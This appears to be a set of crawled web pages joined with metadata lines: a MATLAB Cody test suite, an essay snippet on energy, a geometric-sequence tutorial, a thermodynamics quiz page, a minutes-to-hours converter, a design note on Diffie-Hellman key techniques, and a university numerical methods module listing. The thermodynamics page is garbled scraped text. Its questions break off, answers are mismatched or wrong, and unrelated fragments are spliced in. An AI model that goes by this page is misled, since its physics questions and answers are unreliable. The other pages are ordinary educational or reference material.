[ "Cody\n\n# Problem 151. Magic!\n\nSolution 11823\n\nSubmitted on 28 Jan 2012\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = magic(3); y_correct = true; assert(isequal(magical(x),y_correct))\n\n2   Pass\nx = magic(7); y_correct = true; assert(isequal(magical(x),y_correct))\n\n3   Pass\nx = eye(7); y_correct = false; assert(isequal(magical(x),y_correct))\n\n4   Pass\nx = magic(2); y_correct = false; assert(isequal(magical(x),y_correct))\n\n5   Pass\nx = magic(3)+1; y_correct = false; assert(isequal(magical(x),y_correct))\n\n6   Fail\nx = flipud(magic(9)); y_correct = true; assert(isequal(magical(x),y_correct))\n\nAssertion failed.\n\n7   Fail\nx = fliplr(magic(11)); y_correct = true; assert(isequal(magical(x),y_correct))\n\nAssertion failed.\n\n8   Pass\nx = magic(4); y_correct = true; assert(isequal(magical(x),y_correct))\n\n9   Fail\nx = flipud(magic(8)); y_correct = true; assert(isequal(magical(x),y_correct))\n\nAssertion failed.\n\n10   Pass\nx = [1 2; 3 4]; y_correct = false; assert(isequal(magical(x),y_correct))\n\n11   Pass\nx = [1 2 3; 4 5 6]; y_correct = false; assert(isequal(magical(x),y_correct))\n\n12   Pass\nx = ones(2); y_correct = false; assert(isequal(magical(x),y_correct))\n\n13   Pass\nx = [7 1 6; 3 5 7; 4 9 3]; y_correct = false; assert(isequal(magical(x),y_correct))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.59172285,"math_prob":0.99981743,"size":1650,"snap":"2019-51-2020-05","text_gpt3_token_len":546,"char_repetition_ratio":0.2582017,"word_repetition_ratio":0.054393306,"special_character_ratio":0.34969696,"punctuation_ratio":0.16513762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9985161,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-05T17:50:29Z\",\"WARC-Record-ID\":\"<urn:uuid:ac8c7215-1eb0-4bf9-a32c-ba0639016df7>\",\"Content-Length\":\"80645\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9480235e-71ee-4389-a445-62a1235cb0ce>\",\"WARC-Concurrent-To\":\"<urn:uuid:f217de10-074c-41a3-a9a6-6573fe5be825>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://nl.mathworks.com/matlabcentral/cody/problems/151-magic/solutions/11823\",\"WARC-Payload-Digest\":\"sha1:ID7F33L6NOICKH65RV4EDZGMRR4WHPYT\",\"WARC-Block-Digest\":\"sha1:6VOOCRJFR54BH6OU3B25RA4H44YRDIPC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540481281.1_warc_CC-MAIN-20191205164243-20191205192243-00092.warc.gz\"}"}
https://www.bartleby.com/essay/Physical-Science-P3CH76AZ9EQ
[ "", null, "# Physical Science\n\nDecent Essays\nAssignment 1\n\nEnergy can be converted from one form into another in three basic ways know as the action of force. The first one is gravitational forces which is when gravity accelerates a falling object, its converts its potential energy to kinetic energy. Likewise, when an object is lifted the gravitational field stores the energy exerted by the lifter as potential energy in the earth-object system. The second one is electric and magnetic force fields which is charged particles, upon which electrical fields exert forces, possess potential energy in the presence of an electric field in a way similar to that of an object in a gravitational field. These force fields can accelerate particles, converting a particle's potential energy into" ]
[ null, "https://assets.bartleby.com/1.17/images/placeholders/essay_preview.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9537343,"math_prob":0.92687106,"size":7044,"snap":"2023-14-2023-23","text_gpt3_token_len":1355,"char_repetition_ratio":0.15269886,"word_repetition_ratio":0.006849315,"special_character_ratio":0.18526405,"punctuation_ratio":0.09468822,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97981304,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T21:09:10Z\",\"WARC-Record-ID\":\"<urn:uuid:b23c9827-4a1d-47ab-91a2-39183701abb3>\",\"Content-Length\":\"51840\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ff405dc1-f746-4fa5-a3f1-d7de79b302e4>\",\"WARC-Concurrent-To\":\"<urn:uuid:eac7383c-459a-473c-bb32-de8d9ea4f3e0>\",\"WARC-IP-Address\":\"18.67.65.30\",\"WARC-Target-URI\":\"https://www.bartleby.com/essay/Physical-Science-P3CH76AZ9EQ\",\"WARC-Payload-Digest\":\"sha1:NBTNJNNRDQMYEEUGMKER73CGFR2WWOIU\",\"WARC-Block-Digest\":\"sha1:FBBZ2PU6HMICMTMYIIO2M5TBBVOENAHI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948871.42_warc_CC-MAIN-20230328201715-20230328231715-00188.warc.gz\"}"}
https://mathsux.org/tag/geometric-sequence/
[ "## What is a Geometric Sequence?\n\nGeometric Sequence Formula:\n\nan=a1r(n-1)\n\na1 = First Term\n\nr=Common Ratio (Number Multiplied/Divided by each successive term in sequence)\n\nn= Term Number in Sequence\n\nHi everyone and welcome to Mathsux! In this post, we are going to answer the question, what is a geometric sequence (otherwise known as a geometric progression)? We will accomplish this by learning how to identify a geometric sequence, then we will break down the geometric sequence formula an=a1r(n-1), and solve two different types of examples. As always if you want more questions, check out the video below and the practice problems at the end of this post. Happy calculating! 🙂\n\n## What are Geometric Sequences?\n\nGeometric sequences are a sequence of numbers that form a pattern when the same number is either multiplied or divided to each subsequent term. Take a look at the example of a geometric sequence below:\n\nExample:\n\nNotice we are multiplying 2 by each term in the sequence above. If the pattern were to continue, the next term of the sequence above would be 64. This is a geometric sequence!\n\nIn this geometric sequence, it is easy for us to see what the next term is, but what if we wanted to know the 15th term?  Instead of writing out and multiplying our terms 15 times, we can use a shortcut, and that’s where the Geometric Sequence formula comes in handy!\n\n## Geometric Sequence Formula:\n\nTake a look at the geometric sequence formula below, where each piece of our formula is identified with a purpose.\n\nan=a1r(n-1)\n\na1 = The first term is always going to be that initial term that starts our geometric sequence. In this case, our sequence is 4,8,16,32, …… so our first term is the number 4.\n\nr= One key thing to notice about the formula below that is unique to geometric sequences is something called the Common Ratio. The common ratio is the number that is multiplied or divided to each consecutive term within the sequence.\n\nn= Another interesting piece of our formula is the letter n, this always stands for the term number we are trying to find. A great way to remember this is by thinking of the term we are trying to find as the nth term, which is unknown.\n\nNow that we broke down our geometric sequence formula, let’s try to answer our original question below:\n\n## Example #1: Common ratio r>1\n\nStep 1: First let’s identify the common ratio between each previous and subsequent term of the sequence. Notice each term in the sequence is multiplied by 2 (as we identified earlier in this post). Therefore, our common ratio for this sequence is 2.\n\nStep 2: Next, let’s write the geometric sequence formula and identify each part of our formula (First Term=4, Term number=15, common ratio=2).\n\nStep 3: Now let’s fill in our formula and solve with the given values.\n\nLet’s look at another example where, the common ratio is a bit different, and instead of multiplying a number, this time we are going to be dividing the same number from each subsequent term, (this can also be thought of as multiplying by a common ratio that is a fraction):\n\n## Example #2: Common ratio 0<r<1\n\nStep 1: First let’s identify the common ratio between each number in the sequence. Notice each term in the sequence is divided by 2 (or multiplied by 1/2 that way it is shown below).\n\nStep 2: Next, let’s write the geometric sequence formula and identify each part of our formula (First Term=1000, Term number=10, common ratio=1/2).\n\nStep 3: Next let’s fill in our formula and solve with the given values.\n\nThink you are ready to practice solving geometric sequences on your own? Try the following practice questions with solutions below:\n\n## Practice Questions:\n\n1. Find the 12th term given the following sequence: 1250, 625, 312.5, 156.25, 78.125, ….\n2. Find the 17th term given the following sequence: 3, 9, 27, 81, 243,…..\n3. Find the 10th term given the geometric sequence: 5000, 1250, 312.5, 78.125 …..\n4. Shirley has \\$100 that she deposits in the bank. She continues to deposit twice the amount of money every month. How much money will she deposit in the twelfth month at the end of the year?\n\n## Fun Fact!\n\nDid you know that the geometric sequence formula can be considered an explicit formula? An explicit formula means that even though we do not know the other terms of a sequence, we can still find the unknown value of any term within the given sequence. For example, in the first example we did in this post (example #1), we wanted to find the value of the 15th term of the sequence. We were able to do this by using the explicit geometric sequence formula, and most importantly, we were able to do this without finding the first 14 previous terms one by one…life is so much easier when there is an explicit geometric sequence formula in your life!\n\nOther examples of explicit formulas can be found within the arithmetic sequence formula and the harmonic series.\n\n## Related Posts:\n\nLooking to learn more about sequences? You’ve come to the right place! Check out these sequence resources and posts below. Personally, I recommend looking at the finite geometric sequence or infinite geometric series posts next!\n\nArithmetic Sequence\n\nRecursive Formula\n\nFinite Arithmetic Series\n\nFinite Geometric Series\n\nInfinite Geometric Series\n\nGolden Ratio in the Real World\n\nFibonacci Sequence\n\nStill, got questions? No problem! Don’t hesitate to comment below or reach out via email. And if you would like to see more MathSux content, please help support us by following ad subscribing to one of our platforms. Thanks so much for stopping by and happy calculating!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9348094,"math_prob":0.9882632,"size":5346,"snap":"2023-40-2023-50","text_gpt3_token_len":1205,"char_repetition_ratio":0.18532385,"word_repetition_ratio":0.07891892,"special_character_ratio":0.23176207,"punctuation_ratio":0.11834862,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99942696,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-05T01:47:53Z\",\"WARC-Record-ID\":\"<urn:uuid:6f2b02e1-71ba-49c9-8613-eacea19c4d3e>\",\"Content-Length\":\"140813\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:514d92b1-d04b-47a4-b4db-1e02cb550433>\",\"WARC-Concurrent-To\":\"<urn:uuid:dc7f8ce5-e697-4d48-a89f-d02ff2224036>\",\"WARC-IP-Address\":\"50.16.223.119\",\"WARC-Target-URI\":\"https://mathsux.org/tag/geometric-sequence/\",\"WARC-Payload-Digest\":\"sha1:ZNWXSMO6HN2PJA4BDFIKRPC74XSXRQKX\",\"WARC-Block-Digest\":\"sha1:E62G74ZAAOT2SJAA5F7ESPGXWTTJAHAZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511717.69_warc_CC-MAIN-20231005012006-20231005042006-00054.warc.gz\"}"}
http://dunanscastle.tv/insect/rpa/trippy/72778696f0692462055920c8-heat-and-thermodynamics-mcq-with-solutions
[ "# heat and thermodynamics mcq with solutions\n\nCarnot cycle has maximum efficiency for (a) reversible engine (b) irreversible engine (c) new engine (d) petrol engine (e) diesel engine. 1. Answer: a. 110 J of heat is added to a gaseous system, C neither mass nor energy crosses the boundaries of the system. A sink, that is, the system where heat is rejected, is essential for the conversion of heat into work. Heat is a form of:.\n\n-78. Questions are made from the laws of Thermodynamics, basic properties, and work-heat transfer. View Answer. Thermal conductivity is mainly a function of the motion of the free electrons therefore property of a material, not a path function. One gram of sample of NH 4 NO 3 is decomposed in a bomb calorimeter. Chemical thermodynamics entails not only laboratory measurements of various thermodynamic properties, but also the application of mathematical methods to the study of chemical Zeroth 2. What is the molar heat of decomposition of NH 4 NO 3? Chapter 1: Some Basic Concepts of Chemistry Class 11 MCQ Questions. B Thermal Energy . Heat is a form of:.\n\nThermodynamics is a branch of science that pacts with the connection between heat and other aspects of energy. Check the below NCERT MCQ Questions for Class 11 Physics Chapter 12 Thermodynamics with Answers Pdf free download. C S02, NH3, C02, moisture. In a clinical thermometer, the mercury in the capillary tube does not contract 6.\n\na. mkT. (ii) the extent to which a chemical reaction proceeds. Why mercury is used as a thermometric Ans: 1st law of Thermodynamics. 2. Specific heat and latent heat of fusion and vaporization. Second 4. Heat C. Chemical energy D. Thermal energy 2. Page-2 section-1 Thermodynamic equation of state. C Entropy . and P.E. Energy balance 149. contact. Q1) Water falls from a height 500m. Heat and Thermodynamic Physics MCQs 1.\n\nB hyperbolic expansion.\n\nOne litre of water at 30 degree Centigrade is mixed with one liter of water at 50 degree Centigrade. c. both saturated and unsaturated air.\n\n1. Learn the MCQ Question for Class 11 Chemistry cross-check your answers with definite Solutions and furthermore Check your preparation for examinations. Here Q 2 = 50 J. Q 1 = 80 J. Class 11 Chemistry MCQ with Answers Chapter Wise. Carnot engine is the base engine for all the other engines. Explanation: According to the description of path given, through the path A and path B system undergoes cycle, Writing the first law equation for path A, Q A = E A + W A and for path B, Q B = E B + W B. A. Heat and Thermodynamics Mcqs for Preparation - PakMcqs MCQ in Thermodynamics Part 1 Answers. An open system is one in which. heat and thermodynamics these questions are' 'thermodynamics multiple choice questions and answers april 21st, 2018 - mcq quiz on thermodynamics multiple choice questions and answers on thermodynamics Heat And Thermodynamics Multiple Choice Questions Heat and Thermodynamics MCQs With Answers The Sun is a major source of:. 92. C. 7. 2. First 3. 1. 64 If a fluid expands suddenly into vacuum through an orifice of large dimension, then such a process is called. (d) mass crosses the boundary but not the energy.\n\n8527521718; Online Support; Menu. ANSWER. These questions are chosen from a collection of most authoritative and best reference books on Physics. 9. (b) heat can be transferred for low temperature to high temperature source by using refrigeration cycle. Learn and Practice Thermodynamics variety of MCQ Questions and Answers of Mechanical Engineering, Useful for GATE Exams, Competitive exams, Entrance exams. Solution: (b) Heat and work cannot be transferred into the ice kept in a well insulated thermos flask, hence, it is an isolated system. MCQs: Thermodynamics Test Questions - Mcqs Clouds is a portal which provide MCQ Questions for all competitive examination such as GK mcq question, competitive english mcq question, arithmetic aptitude mcq question, Data Intpretation, C and Java programing, Reasoning aptitude questions and answers with easy explanations. 3.5 . - 2 Answer: (a) 1 : 1. Answer. C. system has temperature. Answer. Definition: Chemical thermodynamics is the study of the interaction of heat and work with chemical reactions or physical state changes within the confines of thermodynamic laws. d. Equal in all the cases. C. Entropy change. Q2. It has four fundamental laws. Q9. If you want to get knowledge on an open system, closed system, and isolated system; intensive and extensive properties, pure substance, homogeneous and heterogeneous system; triple point and critical point and the laws of thermodynamic systems then you go through the energy. 7.A sample of an ideal gas has volume 2V, Pressure 2P and Temperature T.The mass of each molecule of the gas is m.The density of the gas is. 5.\n\nc) The triple point of water is one of the reference points on the thermodynamic scale of temperature. Engineering Thermodynamics MCQ with Answers. 1) All the commercial liquid fuels are derived from natural petroleum (or crude oil). 24. C. Ethane is a better fuel than CH 4 C H 4.\n\nIf the temperature of the plate increases, what Assuming, that the refrigerator cycle is reversible, for every joule of work done, the heat delivered to the surrounding will be nearly: (a) 10 J (b) 20 J (c) 30 J (d) 50 J. Heat from the Sun reaches Earth by:. b) The first law of thermodynamics is also known as the law of thermal equilibrium. Which of the following concepts best describes a chlorophyll molecule absorbing light and changing it into chemical energy?\n\nNow solar energy enters the room from windows at an average rate of 1 kJ/s while a 100-W fan is turned on to circulate the air in the room. Chemical thermodynamics entails not only laboratory measurements of various thermodynamic properties, but also the application of mathematical methods to the study of chemical Heat of combustion of methane and ethane are -291.7 Kcal & 441.2 Kcal respectively: Methane is a better fuel because ethane is poisonous. Answer: c. Clarification: As Q=U+W.\n\n(b) The first law of thermodynamics is also known as the law of thermal equilibrium. B mass crosses the boundary but not the energy. It deals with the concepts of heat, temperature and interconversion of heat into other forms of energy i.e., electrical, mechanical, chemical magnetic etc. (c) heat can be transferred from low temperature to high temperature source if COP of process is more than unity (d) heat cant be transferred from low temperature to high temperature source without the aid of external energy Chapter 2: Structure of Atom Class 11 MCQ Questions. An aluminum plate has a circular hole. 81. thermodynamics these questions are' 'thermodynamics multiple choice questions and answers april 21st, 2018 - mcq quiz on thermodynamics multiple choice questions and answers on thermodynamics Heat And Thermodynamics Multiple Choice Questions Heat and Thermodynamics MCQs With Answers The Sun is a major source of:.\n\nD both energy and mass cross the boundaries of the system. Thermodynamics Class 11 MCQs Questions with Answers. 1535 kJ/kg. D. H = U + PV. 2. Deals with conversion of mass and energy. C. specific heat capacity. Learn Engineering Thermodynamics MCQ questions & answers are available for a Mechanical Engineering students to clear GATE exams, various technical interview, competitive examination, and another entrance exam. Multiple Choice Questions 1. Third Thermodynamics Physics Practice questions, MCQs, Past Year Questions (PYQs), NCERT Questions, Question Bank, Class 11 and Class 12 Questions, NCERT Exemplar Questions and Remain the same always. ECAT preparation - Heat and Thermodynamics,Multiple Choice Questions on Thermodynamics - Quiz. Access Free Mcqs On Heat And Thermodynamics With Answers MCQs: 2 . Internal energy of a perfect gas is.\n\n(a) wholly potential energy. Specific heat and latent heat of fusion and vaporization. The internal energy change in a system that has absorbed 2 kcal of heat and done 500 J of work is.\n\n1." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8876774,"math_prob":0.8157602,"size":27751,"snap":"2022-27-2022-33","text_gpt3_token_len":6410,"char_repetition_ratio":0.20575197,"word_repetition_ratio":0.18913044,"special_character_ratio":0.22492883,"punctuation_ratio":0.13859154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9743005,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-17T19:17:08Z\",\"WARC-Record-ID\":\"<urn:uuid:64bb1cbd-7abe-4629-b4dc-aeb492424bbd>\",\"Content-Length\":\"66975\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:666da858-1a36-4fe6-b1bc-e7d198ca7829>\",\"WARC-Concurrent-To\":\"<urn:uuid:46aaee08-2609-4ecb-a620-2a503d8a7e35>\",\"WARC-IP-Address\":\"185.181.126.124\",\"WARC-Target-URI\":\"http://dunanscastle.tv/insect/rpa/trippy/72778696f0692462055920c8-heat-and-thermodynamics-mcq-with-solutions\",\"WARC-Payload-Digest\":\"sha1:EKYV56DL3ABRFGL4KMQKVY7XJSUD4YWX\",\"WARC-Block-Digest\":\"sha1:VMUCVZTZIH7X2QMLMEGVFPVB4WCLJX54\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573104.24_warc_CC-MAIN-20220817183340-20220817213340-00345.warc.gz\"}"}
https://hoursfinder.com/0-9-hours/127-minutes-to-hours.html
[ "", null, "We collected information about 127 Minutes To Hours for you. Follow the liks to find out everything about 127 Minutes To Hours.\n\n### Convert 127 Minutes to Hours - CalculateMe.com\n\nhttps://www.calculateme.com/time/minutes/to-hours/127\n26 rows\n\n### What Is 127 Minutes In Hours? (127 min to hr)\n\nhttps://minuteshours.com/127-minutes-to-hours\n10 rows\n\n### 127 Minutes to Hours | 127 min to hr - Convertilo\n\nhttps://convertilo.com/127-minutes-to-hours\n10 rows\n\n### 127 mins in hours. Convert 127 mins to hours - TotalCalc\n\nhttps://totalcalc.com/127-mins-to-hours\nWhat is 127 Minutes (min) in Hours (h)? How to convert 127 mins to hours. What is 127 Minutes (min) in Hours (h)? How many utes (m in 127 M? 127 mins is 2.1166666667 hours.\n\n### What is 127 Minutes in Hours? Convert 127 min to hr\n\nhttps://whatisconvert.com/127-minutes-in-hours\nTo calculate 127 Minutes to the corresponding value in Hours, multiply the quantity in Minutes by 0.016666666666667 (conversion factor). In this case we should multiply 127 Minutes by 0.016666666666667 to get the equivalent result in Hours: 127 Minutes x 0.016666666666667 = 2.1166666666667 Hours.\n\n### Minutes to Hours Converter - Calculator Soup\n\nhttps://www.calculatorsoup.com/calculators/conversions/minutes-to-hours.php\nWritten mathematically as a value of 1 it is [60 min / 1 hr] = 1. The inverse is also true that [1 hr / 60min] = 1. To convert minutes to hours, divide the minutes by 60. To show an example and how it works mathematically, let's say we want to convert 195 minutes to hours. We multiply by [1 hr / …\n\n## Searching for 127 Minutes To Hours?\n\nYou can just click the links above. The info is collected for you." ]
[ null, "https://hoursfinder.com/img/post.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7829637,"math_prob":0.7725232,"size":1307,"snap":"2022-05-2022-21","text_gpt3_token_len":361,"char_repetition_ratio":0.19646968,"word_repetition_ratio":0.054054055,"special_character_ratio":0.32593727,"punctuation_ratio":0.14925373,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97804475,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-24T00:24:04Z\",\"WARC-Record-ID\":\"<urn:uuid:7683fc31-335c-4630-99ca-f254f434c62c>\",\"Content-Length\":\"17011\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eede5cc4-f2a7-4739-90b3-6bbe48bb64be>\",\"WARC-Concurrent-To\":\"<urn:uuid:958cd963-95b1-40a4-9225-c9232941bfa4>\",\"WARC-IP-Address\":\"104.21.27.216\",\"WARC-Target-URI\":\"https://hoursfinder.com/0-9-hours/127-minutes-to-hours.html\",\"WARC-Payload-Digest\":\"sha1:Z6QN5ENIBXIEBVBORUSZW2Y7BTQB2TTE\",\"WARC-Block-Digest\":\"sha1:3KJOQVBAUTU7GWRJYEA3CRDYGQXHDPTF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662562106.58_warc_CC-MAIN-20220523224456-20220524014456-00527.warc.gz\"}"}
https://mathmesh.com/Documentation/Design/mesh-13-meta-dh.html
[ "# Mesh-13 Meta-Cryptography II: Advanced Diffie-Hellman\n\n#### Operations on Cryptographic Keys\n\nHaving described the basic Diffie Hellman scheme described in the textbooks, we can use it in a lot of ways that the textbooks don't mention.\n\nFor ease of explanation, the schemes are shown using traditional Diffie-Hellman using multiplication modulo a prime. But the techniques themselves rely only on the properties of a commutative group and thus apply to any Diffie-Hellman scheme including elliptic curve variants. The only caveat being that some of the particular elliptic curve forms used for efficiency can make implementation a little challenging.\n\nOne of the things I realized in writing this document is that Diffie-Hellman is such a flexible system that in several cases there is more than one way to achieve a particular effect.\n\n## Hierarchical key agreement\n\nAs shown in the introduction, to generate a Diffie-Hellman key, Alice\n\n• Chooses random number a from the set 1..(p-1)\n• Calculates the public key Pa = ea mod p\n\nThis works well for the traditional use case for public key cryptography in which Alice generates a public key pair and publishes her public key in a directory where anyone can look it up. But what if we wanted to design a cryptographic protocol in which Alice uses a different public key pair for every other person she communicates with without the need to remember the key pair she used for each one?\n\nThis particular requirement occurs in many anonymity and privacy protection protocols such as TOR and the use of public key based authentication at\n\nA simple way that Alice can do this is to generate a master private key a and use a cryptographic digest function H(m) that has been modified to provide a number in the range 1..(p-1) rather than the usual sting of bits to create a new keypair for each party she wants to communicate with. If Alice wants to communicate with the site example.com, she calculates a new private key for that site as:\n\naexample.com = H(a + 'example.com')\n\nAlternatively, we can perform the addition after the digest function:\n\naexample.com = a + H('example.com')\n\nYet another way to achieve the same result is to use the key pair addition property described below.\n\n## Multiplying private keys.\n\nIn the introduction, we saw that\n\n(eb mod p)a mod p = (ea mod p)b mod p = eab mod p\n\nWe can perform a key agreement with three keys just as easily:\n\n((ea mod p)b mod p)c mod p = eabc mod p\n\nAgain, we can do the exponentiation operations in any order we choose. Or if we happen to know more than one of the private keys, we can simply multiply them together instead:\n\n(eb mod p)ac mod p = (ea mod p)bc mod p = eabc mod p\n\nThis particular scheme might not appear to be very useful as both the sender and the receiver have to know the value c. But if you look closely you will notice that we don't perform the private key operation with the private key, we use the private key multiplied by a random value that changes every time.\n\nThe reason this is important is that implementing an exponentiation step (or its elliptic curve equivalent) requires a processor to make a series of calculations whose pattern depends on the private key. And if the software isn't written exactly so, minute variations in the pattern of processing can reveal the private key to an attacker observing the power consumption, timing, radio emissions or even in some cases the noise made by the device. These are known as sideband attacks and a particularly effective form of sideband attack developed by Paul Kocher involves causing the device to perform a sequence of private key operations in a loop and performing sophisticated statistical analysis to uncover the private key.\n\nMultiplying the private key by a constant factor is a form of what is known as key blinding, a powerful technique for defeating sideband attacks.\n\nMultiplying the private key on both sides with a common constant provides us with a method of guiding protocol implementers to the use of a key blinding approach. But what if we want to use key blinding with a regular Diffie-Hellman protocol? No problem, just split the private key into two parts whose sum is the private key\n\na = x + y\n\nWe then perform the Diffie-Hellman key agreement separately on x and y and multiply the result together.\n\n(eb mod p)x mod p . (eb mod p)y mod p = ebx.eby mod p = eab mod p\n\nThis approach works very well if a is large. But it is a random number is just as likely to be 1 as any other number. If a is small then we don't get as much key blinding effect as we would like. So instead we take advantage of a little piece of additional math:\n\nep-1 mod p = 1\n\nWhy does this work? Well 1 is the identity for modular multiplication and the order of the group is p-1. If we keep multiplying a number by itself in a group with a finite number of elements, eventually we must run out of numbers and arrive at the original number. Once this happens then the sequence must repeat. And the number of elements in the group is the order of the group by definition. Since any number multiplied by the identity is itself, the result we encounter before running out of numbers is the identity element of the group.\n\nWhat this means is that we can pick any x and y provided that they satisfy:\n\na = x + y mod p-1\n\nThis feature of Diffie-Hellman allows us to achieve a very powerful technique called proxy re-encryption. Instead of splitting the private key, performing both Diffie-Hellman calculations on the same computer and combining the results, we split the private key and send the two (or more) parts to different computers.\n\nSplitting the private key in this way allows us to create a system in which two (or more) parties must both participate in order to decrypt a message. For example, one of the parties might be a cloud service that has the function of monitoring how many classified documents a user is decrypting without being able to decrypt them itself and thus be a potential source of compromise.\n\nThere are many, many other applications of Proxy Re-Encryption which will be described in a companion paper.\n\n## Combing Key Pairs\n\nAs we saw in the example above, we can split a private key into two parts, perform the Diffie-Hellman operation on each part and combine the results. The same property allows us to do combine two key pairs to derive a third.\n\nGiven two Diffie-Hellman keys (a, ea) and (b, eb), we can create a third keypair (c, ec) where:\n\nc = a + b\n\nec = ea.eb = ea+b = ec\n\nOne very important way that we can make use of this feature is in a protocol I proposed called co-operative key generation. In this protocol we are concerned with the problem of a devices whose random number generators are insufficiently random being used to generate keypairs. A party (e.g. a Certificate Authority) wants to be able to contribute randomness to the key generation process in such a way that:\n\n• The co-operating party can verify that the randomness they contributed was used in the generation of the public key.\n• If the generator of the key-pair uses a strong random number generator, the co-operating party gains no advantage in being able to break the key pair from having contributed.\n• If the generator of the key-pair uses a weak random number generator and the generator used by the co-operating party is strong, the resulting key is strong against an attack by any party other than the co-operating party.\n\nThe key pair combination property may also be used to provide an enhanced version of the hierarchical key generation scheme described above." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9240066,"math_prob":0.93080705,"size":6731,"snap":"2020-10-2020-16","text_gpt3_token_len":1437,"char_repetition_ratio":0.1272484,"word_repetition_ratio":0.011666667,"special_character_ratio":0.20517011,"punctuation_ratio":0.0651341,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98074424,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-23T01:17:36Z\",\"WARC-Record-ID\":\"<urn:uuid:3b956a45-6d0e-44af-9871-1037bb2eadd3>\",\"Content-Length\":\"12869\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b9c13edb-12bb-4cb2-af2a-abb2606e592c>\",\"WARC-Concurrent-To\":\"<urn:uuid:7fc356f6-9c89-4da7-9e64-901921247dfb>\",\"WARC-IP-Address\":\"96.237.138.82\",\"WARC-Target-URI\":\"https://mathmesh.com/Documentation/Design/mesh-13-meta-dh.html\",\"WARC-Payload-Digest\":\"sha1:SKVGR4GGB6KEU7D75TAZQ32OZ5XZBOTJ\",\"WARC-Block-Digest\":\"sha1:E4HHEDBMMQ2AN3CYPDIG6DXCH6NEP6E3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145742.20_warc_CC-MAIN-20200223001555-20200223031555-00445.warc.gz\"}"}
https://webprod3.leeds.ac.uk/catalogue/dynmodules.asp?Y=202122&M=MATH-3476
[ "# 2021/22 Undergraduate Module Catalogue\n\n## MATH3476 Numerical Methods\n\n### 15 creditsClass Size: 100\n\nModule manager: Adrian Barker\nEmail: [email protected]\n\nTaught: Semester 1 (Sep to Jan) View Timetable\n\nYear running 2021/22\n\n### Pre-requisites\n\n COMP2421 Numerical Computation MATH2600 Numerical Analysis MATH2601 Numerical Analysis with Computation\n\nModule replaces\n\nMATH3474\n\nThis module is not approved as a discovery module\n\n### Module summary\n\nOrdinary and partial differential equations (ODEs and PDEs) are ubiquitous in the modelling of real problems arising in science, engineering and economics. However, only rarely can ODEs and PDEs be solved exactly in mathematical terms, and so approximate methods of solution are of paramount importance.The basic idea employed in this course is that of discretizing the original continuous problem to obtain a discrete problem, or system of equations, that may be solved with the aid of a computer.This course introduces the basic ideas underlying approximation and its application, via finite differences, to the solution of ODEs and PDEs. As part of the approximation process, numerical linear algebraic techniques are developed in order to provide calculable solutions to the discrete equations.\n\n### Objectives\n\nLearning outcomes\nOn completion of this module, students should be able to:\n- work independently to acquire an understanding of the relevant background theory;\n- work collaboratively to apply theory in solving problems;\n- interpolate periodic and non-periodic data on a finite 1-D interval using minimax, Chebyshev and forced-oscillation approximation techniques;\n- understand the Runge phenomenon; understand spectral accuracy; approximate partial derivatives by differences in both 1-and 2-D to prespecified orders and accuracy using both series and operator methods;\n- set up linear systems of simultaneous algebraic equations to solve 1- and 2-D elliptic BVPs; and\n- solve such equations by a variety of direct and iterative methods; understand the theory underlying such methods.\n\n### Syllabus\n\nApproximation Theory - Lagrange interpolation; Newton divided differences; interpolation errors; Weierstrass' theorem; minimax approximations; 